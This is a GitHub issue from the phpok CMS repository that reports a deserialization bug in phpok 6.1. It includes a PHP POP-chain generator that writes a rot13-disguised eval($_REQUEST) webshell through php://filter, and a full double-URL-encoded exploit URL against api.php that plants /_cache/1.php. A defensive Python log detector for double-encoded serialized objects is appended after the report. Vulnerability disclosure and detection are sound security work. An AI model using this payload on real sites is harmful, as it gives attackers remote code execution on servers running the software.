qinggan / phpok

This is an extremely flexible enterprise website program that supports all kinds of custom configuration, including site-wide global parameters, category extensions, project extensions and various content models!
https://www.phpok.com
MIT License
242 stars, 9 forks

phpok 6.1 has a new deserialization vulnerability, and can write any files #13

Closed T4rnRookie closed 1 year ago

T4rnRookie commented 2 years ago

I noticed that framework/phpok_call.php::_format_ext_all has an unserialize, and phpok 5.4 had already fixed something just like this: https://www.anquanke.com/post/id/194453#h2-5

But in /framework/phpok_call.php I found a parse_str:

[image]

We can control $rs, so we just need to use double URL encoding to bypass it, but notice this:

[image]

For alias, we can use weak comparison to bypass it,

and we can write a POP chain that uses rot13 to bypass it:

```php
<?php
// Property values for the cache class used as the POP chain in this report.
class cache
{
    protected $timeout = 1800;
    protected $status = true;
    protected $prefix = 'qinggan_';
    protected $keyfile = '';
    // php://filter with rot13 so the written file body is decoded on the way out
    protected $folder = 'php://filter/string.rot13/resource=./_cache/';
    protected $key_id = "1";
    // rot13-encoded file body
    protected $key_list = '<?cuc riny($_ERDHRFG[1]); ?>';
    protected $debug = false;
    protected $time;
    private $time_use = 0;
    private $time_tmp = 0;
    private $count = 0;
}

// Double URL-encode the serialized object for the request below.
echo urlencode(urlencode(serialize(new cache())));
```

final payload:

http://127.0.0.1:8010/api.php?c=call&f=index&data={%22m_picplayer%22:%220%26type_id%3Dformat_ext_all%26x%5Bform_type%5D%3Durl%26x%5Bcontent]=O%253A5%253A%2522cache%2522%253A12%253A%257Bs%253A10%253A%2522%2500%252A%2500timeout%2522%253Bi%253A1800%253Bs%253A9%253A%2522%2500%252A%2500status%2522%253Bb%253A1%253Bs%253A9%253A%2522%2500%252A%2500prefix%2522%253Bs%253A8%253A%2522qinggan_%2522%253Bs%253A10%253A%2522%2500%252A%2500keyfile%2522%253Bs%253A0%253A%2522%2522%253Bs%253A9%253A%2522%2500%252A%2500folder%2522%253Bs%253A44%253A%2522php%253A%252F%252Ffilter%252Fstring.rot13%252Fresource%253D.%252F_cache%252F%2522%253Bs%253A9%253A%2522%2500%252A%2500key_id%2522%253Bs%253A1%253A%25221%2522%253Bs%253A11%253A%2522%2500%252A%2500key_list%2522%253Bs%253A28%253A%2522%253C%253Fcuc%2Briny%2528%2524_ERDHRFG%255B1%255D%2529%253B%2B%253F%253E%2522%253Bs%253A8%253A%2522%2500%252A%2500debug%2522%253Bb%253A0%253Bs%253A7%253A%2522%2500%252A%2500time%2522%253BN%253Bs%253A15%253A%2522%2500cache%2500time_use%2522%253Bi%253A0%253Bs%253A15%253A%2522%2500cache%2500time_tmp%2522%253Bi%253A0%253Bs%253A12%253A%2522%2500cache%2500count%2522%253Bi%253A0%253B%257D"}

and we get a webshell at /_cache/1.php

[image]
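The report above relies on two things a defender can look for in web access logs: a request parameter that only becomes meaningful after being percent-decoded twice, and, once decoded, a serialized PHP object (`O:<len>:"<class>"`) or a `php://filter` stream wrapper. The following detector is an added example written for this page; it is not code from the issue or from phpok. It assumes Apache/nginx-style request lines of the form `METHOD /path?query HTTP/1.1`, measures the encoding depth of each query value from its raw wire form, and flags the indicators named above. The sample request lines are constructed for the example; the second one carries a harmless double-encoded `stdClass` object rather than the chain from the report.

```python
import re
from urllib.parse import unquote

# Indicators taken from the report above: a serialized PHP object
# (O:<len>:"<class>", or C: for custom serialization) and a php://filter
# stream wrapper, both hidden behind repeated URL encoding.
SERIALIZED_OBJECT = re.compile(r'(?:^|[;{:=])[OC]:\d+:"')
PHP_FILTER_WRAPPER = re.compile(r'php://filter', re.IGNORECASE)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing.

    Returns (decoded_text, rounds). rounds == 2 means the value was
    double URL-encoded, which is the bypass the report relies on.
    """
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def split_query_raw(query):
    """Split a query string into (name, raw_value) pairs WITHOUT decoding,
    so the encoding depth of each value is measured from the wire form."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name, value))
    return pairs


def inspect_request(request_line):
    """Examine one 'METHOD /path?query HTTP/1.1' request line and return a
    list of finding strings (empty when nothing looks suspicious)."""
    target = request_line.split(" ")[1] if " " in request_line else request_line
    query = target.partition("?")[2]
    findings = []
    for name, raw in split_query_raw(query):
        decoded, rounds = fully_decode(raw)
        if rounds >= 2:
            findings.append(f"{name}: double URL-encoded ({rounds} rounds)")
        if SERIALIZED_OBJECT.search(decoded):
            findings.append(f"{name}: serialized PHP object after decoding")
        if PHP_FILTER_WRAPPER.search(decoded):
            findings.append(f"{name}: php://filter wrapper after decoding")
    return findings


# Constructed sample request lines (not real traffic). The second carries a
# harmless double-encoded stdClass object, not the chain from the report.
SAMPLE_REQUESTS = [
    'GET /api.php?c=call&f=index&data=%7B%22m_picplayer%22%3A%221%22%7D HTTP/1.1',
    'GET /api.php?c=call&f=index&data={%22m_picplayer%22:%220%26x%5Bcontent%5D%3D'
    'O%253A8%253A%2522stdClass%2522%253A0%253A%257B%257D%22} HTTP/1.1',
]

if __name__ == "__main__":
    for line in SAMPLE_REQUESTS:
        print(line[:60], "->", inspect_request(line) or "clean")
```

Measuring the decode depth from the raw value matters: a framework that has already decoded the query once (as `parse_str` does in PHP) sees only a single remaining layer, which is exactly why the double encoding slips past a check applied to the once-decoded string. Alerting on `rounds >= 2` alone produces some noise from legitimately re-encoded values, so pair it with the object or wrapper signature before paging anyone.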